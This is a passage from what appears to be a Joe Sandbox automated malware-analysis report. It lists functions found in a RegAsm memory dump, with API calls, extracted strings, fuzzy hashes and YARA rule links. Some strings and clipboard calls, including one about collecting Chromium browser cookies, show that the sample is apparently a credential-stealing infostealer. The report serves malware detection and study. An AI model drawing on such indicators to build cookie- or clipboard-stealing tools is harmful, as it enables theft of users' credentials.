RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 004153CE

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 6572dfaa4c449ee5e29a92c2fe4c2dcaaac15b447e53c33fb8f8106f1d51b3f3
Instruction ID: 943e23af0d6dd91a898edd76085a3fd8c960d2a494305841edce980b965485f4
Opcode Fuzzy Hash: 6572dfaa4c449ee5e29a92c2fe4c2dcaaac15b447e53c33fb8f8106f1d51b3f3
Instruction Fuzzy Hash: 9B51A074208340DBD7708F14C891BABB7F5EFC6324F40591DF9958B291D7B8A884CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004180DC Relevance: 3.1, APIs: 2, Instructions: 62COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000), ref: 0041811D
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?), ref: 00418153

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: a1132f27a2ef29765ed952c273d2cc3197dc995f63e57ee037f2fbe20bd9b786
Instruction ID: 6e27a2b2abec2994dcf805ee18975977ad8242ef5e1e614d9ef0a8c2932fa019
Opcode Fuzzy Hash: a1132f27a2ef29765ed952c273d2cc3197dc995f63e57ee037f2fbe20bd9b786
Instruction Fuzzy Hash: 6E1172B4600B00AFD734DF19DC45A13BBB5AB4A324F10862DF496877D0E770B805CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004390C0 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,00409A71), ref: 00439154

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 38043365f18da168cb60a6fa381e6936588179c0f98c922430bf85a100a7a2f4
Instruction ID: 635a42bd2f7ada22fd50e2c92f4b26d5855a71df3811df46c3b63a091907d97f
Opcode Fuzzy Hash: 38043365f18da168cb60a6fa381e6936588179c0f98c922430bf85a100a7a2f4
Instruction Fuzzy Hash: 7E015B71508340AFE708CF14D86475BBBA1EBC5325F208A2DE8A917781C779D909CBC6

Uniqueness

Uniqueness Score: -1.00%

Function 0043918B Relevance: 1.5, APIs: 1, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000), ref: 0043920D

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e908b8566dc4cc2c6a09a0648175a6cba40d2edb7ee9cb217c5f941329e7165e
Instruction ID: f3a7051f491fd6fc6ffc9b4a0ceeb20aeb84f51a71fa5566b1f406e62892fa43
Opcode Fuzzy Hash: e908b8566dc4cc2c6a09a0648175a6cba40d2edb7ee9cb217c5f941329e7165e
Instruction Fuzzy Hash: A70108701083419FE718CF00C86476FBBA1EBC5718F648A5DE8A91B681C379D90ACBC6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0042FB30 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 158clipboardCOMMON

Download Yara Rule

APIs

GetWindowInfo.USER32 ref: 0042FB84
OpenClipboard.USER32 ref: 0042FB96
GetClipboardData.USER32 ref: 0042FBB5
CloseClipboard.USER32 ref: 0042FCF6

Strings

,, xrefs: 0042FC4B
., xrefs: 0042FC43
3, xrefs: 0042FC47

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: Clipboard$CloseDataInfoOpenWindow
String ID: ,$.$3
API String ID: 2278096442-2443765291
Opcode ID: 8ed1288b87611fef8537a6279ba577c7595d378d467feca55224d17aac4b3f7a
Instruction ID: a2a09c552cbc92d64b20322e0a77483ff84a62ea9cd2cb2d139c00aa0f521439
Opcode Fuzzy Hash: 8ed1288b87611fef8537a6279ba577c7595d378d467feca55224d17aac4b3f7a
Instruction Fuzzy Hash: 69618EB45087408FD720DF39D485616BBF0BF06324F54866EE8D68B792D374E40ACBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00416E26 Relevance: 6.5, Strings: 5, Instructions: 283COMMON

Download Yara Rule

Strings

^BZZ, xrefs: 00416FC2
v[info] collected cookies file of the chromium-based browser, xrefs: 00417187
ROIL, xrefs: 00416FE2
L, xrefs: 00417011
QFOp, xrefs: 00416FEA

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: L$QFOp$ROIL$^BZZ$v[info] collected cookies file of the chromium-based browser
API String ID: 0-1718723070
Opcode ID: 90a664518f6001e0956793f8d5554114818d5929565da25cd986faacb2ec7d45
Instruction ID: 814ef259aa330df1dd3c43c21c26b92e975e1d31f4fecf48b6576df6e1276c0e
Opcode Fuzzy Hash: 90a664518f6001e0956793f8d5554114818d5929565da25cd986faacb2ec7d45
Instruction Fuzzy Hash: 94A1B47050C3918BD725CF24C4907ABBBE1AFD6304F19895EE4D98B392C739D846CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004288F9 Relevance: 6.4, Strings: 4, Instructions: 1358COMMON

Download Yara Rule

Strings

1$93, xrefs: 004296E3
%< ;, xrefs: 004296D5
-)32, xrefs: 004296EA
1*L%, xrefs: 004296DC

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: %< ;$-)32$1$93$1*L%
API String ID: 2994545307-2484500576
Opcode ID: 5fba29d3e12f8de3f5df6070ea0c90049aebae0527f4d6c4cdfaf7b96d2fab01
Instruction ID: c327c7d560488285d1282ce960a5647ad204cba84dd7fda4af38b81fb3a75849
Opcode Fuzzy Hash: 5fba29d3e12f8de3f5df6070ea0c90049aebae0527f4d6c4cdfaf7b96d2fab01
Instruction Fuzzy Hash: DFA2BD70205B518FD325CF25C490726BBF2BF96304F588A5EC4964BB92C779F84ACB98

Uniqueness

Uniqueness Score: -1.00%

Function 004222B0 Relevance: 4.2, Strings: 3, Instructions: 419COMMON

Download Yara Rule

Strings

Z], xrefs: 004228B5
<B, xrefs: 00422A41
"$B, xrefs: 00422417

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: <B$"$B$Z]
API String ID: 0-2882126843
Opcode ID: fd0e2dfac66287fa2372d34571bea636eeb100077e208a732ec88e09fd6aa258
Instruction ID: 4b11e4fe4c92c38bb9da5ccb5a0d493b5795638ca31c34afa289436e4a453daf
Opcode Fuzzy Hash: fd0e2dfac66287fa2372d34571bea636eeb100077e208a732ec88e09fd6aa258
Instruction Fuzzy Hash: 34C1EFB5608340DBE724CF24E99176BB3F1FF8A318F44492DE58987391D7799902CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0043F2C0 Relevance: 4.1, Strings: 3, Instructions: 309COMMON

Download Yara Rule

Strings

R-,T, xrefs: 0043F380
gxyz, xrefs: 0043F328
R-,T, xrefs: 0043F490

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: R-,T$R-,T$gxyz
API String ID: 0-1473045628
Opcode ID: b5efb33ac3e993e711666c8653b50938e64ddbdbcbe2705a9398d5ec8ae97cc7
Instruction ID: 8752f172b30a4fc8840558070f7e48616f9c483a5954c09f10883eda336b2287
Opcode Fuzzy Hash: b5efb33ac3e993e711666c8653b50938e64ddbdbcbe2705a9398d5ec8ae97cc7
Instruction Fuzzy Hash: 87B1BFB1A043129BC714CF18C49076BB7E1FF98714F15962EE8959B361D738EC19CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00417533 Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

Z%Z#, xrefs: 004176F6
g5J3, xrefs: 00417751
"!, xrefs: 00417702

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "!$Z%Z#$g5J3
API String ID: 0-3680154002
Opcode ID: 8ed00d91d5689f8cf6484b5cab88b024d0652f8eb37b2e74e5820265a88b68e3
Instruction ID: 4cd97d0cb4d37dced4008e07f1c970fbfd8f554ff5be744b5efd679d2678b006
Opcode Fuzzy Hash: 8ed00d91d5689f8cf6484b5cab88b024d0652f8eb37b2e74e5820265a88b68e3
Instruction Fuzzy Hash: 077167755087418BD724CF18C4906ABB7F1FF85358F108A1DE8E98B391E778D986CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0041817E Relevance: 3.0, APIs: 2, Instructions: 44COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000), ref: 004181A6
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?), ref: 004181D5

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: dce0a83f75d23b84bdd5b58e548a20c491008bb381abb9c9e87a50b8cef88e90
Instruction ID: a4b6cb7168101179ceac4796be8b2f7ae64fa65545b38aea070ab73b894a1f47
Opcode Fuzzy Hash: dce0a83f75d23b84bdd5b58e548a20c491008bb381abb9c9e87a50b8cef88e90
Instruction Fuzzy Hash: A1018FB5900B01AFD7308F15CC41F63BAB9EB4A724F10461DF565876E0D771A840CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042617B Relevance: 2.9, Strings: 2, Instructions: 442COMMON

Download Yara Rule

Strings

((!., xrefs: 00426588
3+"$, xrefs: 004264DC

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID: ((!.$3+"$
API String ID: 1279760036-3635007203
Opcode ID: 68c7b8acec49cb02d5bde5f88ae832b1b5cda3625b841e1b761dd10c39fe21d8
Instruction ID: 82f48be17d3907806e03c53c92e8bf48eba123856fa5e98aca5cb22f903b156c
Opcode Fuzzy Hash: 68c7b8acec49cb02d5bde5f88ae832b1b5cda3625b841e1b761dd10c39fe21d8
Instruction Fuzzy Hash: 0DF15DB0904B419FD360DF39C946763BBF0AB06314F144B5DE8AA8B395E334A8598BD6

Uniqueness

Uniqueness Score: -1.00%

Function 0043EF60 Relevance: 1.5, Strings: 1, Instructions: 293COMMON

Download Yara Rule

Strings

gxyz, xrefs: 0043EFC8

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: gxyz
API String ID: 0-2474275795
Opcode ID: 03fdc5783860b700182615a3f4415c69373714ed62b54d567846ef5001de5555
Instruction ID: 1e9018543ebf042980502a1e72b1be35cc00fbde42be6c42b100faed6cd2c876
Opcode Fuzzy Hash: 03fdc5783860b700182615a3f4415c69373714ed62b54d567846ef5001de5555
Instruction Fuzzy Hash: C4A1AC75A043029BDB18CF29C490B6BB7E1FF88704F14996DE8859B391D735EC19CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004379D4 Relevance: 1.5, Strings: 1, Instructions: 210COMMON

Download Yara Rule

Strings

BxC, xrefs: 0043782D

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: BxC
API String ID: 0-2221695848
Opcode ID: c3c791ef1e25e2dc9691ca779ae71c8be0d4832090c7c11de5e96db832d256f4
Instruction ID: 445728636cb5c8671498a81f06c38a0899c6ad2aaadf33a3af291d3b209166c2
Opcode Fuzzy Hash: c3c791ef1e25e2dc9691ca779ae71c8be0d4832090c7c11de5e96db832d256f4
Instruction Fuzzy Hash: 426103B4604B008FE324CF29C594B27B7F2BB8A714F54595DD49A8BB91C779F806CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00411E79 Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

M%, xrefs: 00412063

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: M%
API String ID: 0-1326118896
Opcode ID: 952fa4850de514643041d99bbad28cf590c5c62a5c2b0077c33bf2d3720b7556
Instruction ID: 5ab1f1bc1da9fe52fa2aafa13eb0f1b41648de4e1bfdf0273c7a95bbfc1a7ec7
Opcode Fuzzy Hash: 952fa4850de514643041d99bbad28cf590c5c62a5c2b0077c33bf2d3720b7556
Instruction Fuzzy Hash: BE81347555C382CAD331CF24C894BEBB7F1BF89305F485A2DD4898B282E7799406CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004378C4 Relevance: 1.4, Strings: 1, Instructions: 198COMMON

Download Yara Rule

Strings

BxC, xrefs: 0043782D

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID: BxC
API String ID: 1279760036-2221695848
Opcode ID: 03f7de6a77c2834690693af6a60a273e932fd180f6b2523f36b2ec49e8d9af97
Instruction ID: aa38517979896fe558639701845d3097ac109e740e6b2d5f628d9be740d43d04
Opcode Fuzzy Hash: 03f7de6a77c2834690693af6a60a273e932fd180f6b2523f36b2ec49e8d9af97
Instruction Fuzzy Hash: E751F4B4604A008FE324CF29C594727B7F2BF8A714F54595DD49A8BB91C779F806CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00423269 Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

n;B, xrefs: 00423288

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: n;B
API String ID: 0-426307772
Opcode ID: 321d09fa8366e85b0d4ebe8afc7d19934a771e89222f6ee040b799bf7b3db0a1
Instruction ID: d4b039e0efc37b344dd005b564336335de670ba2edb84bac23eaff91ad0ad784
Opcode Fuzzy Hash: 321d09fa8366e85b0d4ebe8afc7d19934a771e89222f6ee040b799bf7b3db0a1
Instruction Fuzzy Hash: C061D1B5B086428FC714CF28D89072BB7E2BBC9301F49852DE59AC73A1DB38E901CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004376B1 Relevance: 1.4, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

BxC, xrefs: 0043782D

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: BxC
API String ID: 2994545307-2221695848
Opcode ID: 3638ca8eae23888b17e0c646584c443c7193a4b925feb2c2ff34303d415e7326
Instruction ID: f8b2c0cb024378a75d5485f3fc34c5a4e6094ce4fdd2a84b957ac7c7e5e186e5
Opcode Fuzzy Hash: 3638ca8eae23888b17e0c646584c443c7193a4b925feb2c2ff34303d415e7326
Instruction Fuzzy Hash: EB519CB4604A009FE724CF29C895B27B7B2FF89304F14955DD5964BB92C739F812CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0043E8D0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

gxyz, xrefs: 0043E938

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: gxyz
API String ID: 0-2474275795
Opcode ID: b6a68bba757d6666a85c360621593c2ce69dca0bdfc3b02bf7ef594f4621c469
Instruction ID: a04590afe24b047589b4052f88af0ecb9b2ae2624d166e2a08666b5a2d80224a
Opcode Fuzzy Hash: b6a68bba757d6666a85c360621593c2ce69dca0bdfc3b02bf7ef594f4621c469
Instruction Fuzzy Hash: CC518DB56093019BD714CF16C890B6FBBE2FBC9708F14892DE4959B391D339E904CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00412B63 Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

Q#, xrefs: 00412C93

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: Q#
API String ID: 0-1075711896
Opcode ID: 59b9b6823ee90fa7a567be7dd348609b6ac2b48af7e0e538d08057b415821229
Instruction ID: 32d55a319aafe357e9e262422ba75d9dbd372c38ad0a8d1539302f7f9783ae31
Opcode Fuzzy Hash: 59b9b6823ee90fa7a567be7dd348609b6ac2b48af7e0e538d08057b415821229
Instruction Fuzzy Hash: 8A51137115C782CAE335CF24C855BEFBBF1BB8530AF48592DD09987282E77944068F96

Uniqueness

Uniqueness Score: -1.00%

Function 0041DEF9 Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

*}, xrefs: 0041DF71

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: *}
API String ID: 0-382830742
Opcode ID: c586fc814592ae2dbeb850becdad5dd713b8a717e63e98a4245ac1667d16f7dd
Instruction ID: b12408bf0b014cf358687b13d74ab80d70c752ba6810731af58202686d356d26
Opcode Fuzzy Hash: c586fc814592ae2dbeb850becdad5dd713b8a717e63e98a4245ac1667d16f7dd
Instruction Fuzzy Hash: 4A4153B46083918BC724CF15D4607ABBBF1FF86344F00891DE8D69B750E7B89846CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0043E590 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

gxyz, xrefs: 0043E5F8

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: gxyz
API String ID: 0-2474275795
Opcode ID: e0166e7295f96e67d8db259d84cef0375d05de35df9112f3ddc04c16bbf6cded
Instruction ID: 11963485b7b4c9c9f0ba556438bb29fd3f80f4ffac46e64c381f311231632cdd
Opcode Fuzzy Hash: e0166e7295f96e67d8db259d84cef0375d05de35df9112f3ddc04c16bbf6cded
Instruction Fuzzy Hash: 7D3121B06093029BE714CF16C884B6FBBE1FBC9358F54892EE4844B391D334D905CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004246F8 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

Z?G, xrefs: 00424724

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: Z?G
API String ID: 0-772574331
Opcode ID: 64c88e35f408011f92a92e7ae80977f9bfdda51f069a38c0f4a162424e0ef3cc
Instruction ID: f72f58777529b359895ee69da756ffdf1a88ec262000fd2b85abe27b0ae7cce3
Opcode Fuzzy Hash: 64c88e35f408011f92a92e7ae80977f9bfdda51f069a38c0f4a162424e0ef3cc
Instruction Fuzzy Hash: 03E092F8514B80CFC712CF28DC81B2AB7F0AB57309F044068E80267716D334B425CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0043AF87 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

WnF, xrefs: 0043AF87

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: WnF
API String ID: 0-4067640235
Opcode ID: 193b87f5863617e0a5ad769af78477c013df30811db2f7129c5e18bd7dec8792
Instruction ID: ba80e2827fe0140999d19468f4679c5fb72049caafc0b3656048e05efaebd210
Opcode Fuzzy Hash: 193b87f5863617e0a5ad769af78477c013df30811db2f7129c5e18bd7dec8792
Instruction Fuzzy Hash: 2EC0927DB980018B970DEF34EC60431B3F9EB1B209B00713DC483B3262EA21D422860E

Uniqueness

Uniqueness Score: -1.00%

Function 00407D50 Relevance: .9, Instructions: 857COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb72d5d5eb151fb8b1398d598b09b559c25732894388a0df63299a0e05d0973
Instruction ID: c639300c13d4f6c1b8d01532a834e888c9c6db21dd98b1de477754786fbba85b
Opcode Fuzzy Hash: cdb72d5d5eb151fb8b1398d598b09b559c25732894388a0df63299a0e05d0973
Instruction Fuzzy Hash: 2C52F6316087118BC725DF18D98026BB3E1FFD4314F29893ED9C5A7385DB39A912CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00424E60 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41460f46f7c0dd0f3e9bce00005808a04d4da72d24f02270a3c46ff74e987ebc
Instruction ID: d96efc9f9e8b7c4d6b5b037c853e1618d54574e918502936c46e07dfc10f9950
Opcode Fuzzy Hash: 41460f46f7c0dd0f3e9bce00005808a04d4da72d24f02270a3c46ff74e987ebc
Instruction Fuzzy Hash: 95818EB02007108FDB28CF24C4A1B23B3B2FF96304F554A9DD8928F7A5D779A845CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0042475B Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 371310a93afda27b511246ac92f0b82cce8a510327ab73f1e7e2faf18afd665b
Instruction ID: f8a06b90fae487e825ffc86e858ff52d45885e63713608cfb49096f09dbdaabe
Opcode Fuzzy Hash: 371310a93afda27b511246ac92f0b82cce8a510327ab73f1e7e2faf18afd665b
Instruction Fuzzy Hash: 65718DB5600B818BD324CF29D891B13B7E2BF86314F548A2ED4A647BD2D735F845CB44

Uniqueness

Uniqueness Score: -1.00%

Function 004112AC Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc1ab83314ed71c8e1a25179b7972554ab89eb6574bc4cfbaa66a0dac543df6
Instruction ID: 84219c1075c95ec5a7c6a5927aae85c452ae62ac6b78630ea4e2b468c590f7f5
Opcode Fuzzy Hash: 7fc1ab83314ed71c8e1a25179b7972554ab89eb6574bc4cfbaa66a0dac543df6
Instruction Fuzzy Hash: B451A1759083018BD724CF18C8807ABF7E5FF85354F18992AD999C7395E739E884CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00402A60 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f3ac2204ada8b7eca96380454df738febf6ea16aedec4e14c81f57a7c8a5407
Instruction ID: 6a575f930ab56e7ef056b6b6e36cebd69eab2013b26577edada57524ff4bf233
Opcode Fuzzy Hash: 9f3ac2204ada8b7eca96380454df738febf6ea16aedec4e14c81f57a7c8a5407
Instruction Fuzzy Hash: 7751E3B09046119FDB019F24DD4C75BBBB0FF4571AF048538E84AA22A1D735EE29CBCA

Uniqueness

Uniqueness Score: -1.00%

Function 0041F870 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f60413d035aad1c4f1cbbc368c6a727288b913b01d83919b48583fb4877a688
Instruction ID: f8e991cc18da65848aa83e7cb88fb0aa9886098bbc83cb14f2179ae9b06eff15
Opcode Fuzzy Hash: 7f60413d035aad1c4f1cbbc368c6a727288b913b01d83919b48583fb4877a688
Instruction Fuzzy Hash: D1313BB5211B018FD725CF24C4A1BA3B7F1FF5A314F099A5CC49A8B7A0D779A845CB84

Uniqueness

Uniqueness Score: -1.00%

Function 004025D0 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c93c0877ca641a44405985691beddcebb3fdd9c7c8ede9d23b98dc9091a57a6
Instruction ID: 7ca56e9edeabc8b7a0eaa806e96ed86949b2b1fdd6dea57347a02144b2d74de3
Opcode Fuzzy Hash: 5c93c0877ca641a44405985691beddcebb3fdd9c7c8ede9d23b98dc9091a57a6
Instruction Fuzzy Hash: E031D8706046019BC7149E19CA84927B7E1EF88318F188D7EE899A73C1D77ADC53CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0043C622 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6135e63cc86fc6023023e57876258a961c5881a41e22b309ecc92d886ca3c4e
Instruction ID: 1161400550d734de4d0a3549964895b15aa525f2c8c80ecc1f9979a2a4799a31
Opcode Fuzzy Hash: c6135e63cc86fc6023023e57876258a961c5881a41e22b309ecc92d886ca3c4e
Instruction Fuzzy Hash: D021292951DAE00BCB36CB7D44D513ABAE15F57144B0945BDDCE2C73CAC664D800C7A4

Uniqueness

Uniqueness Score: -1.00%

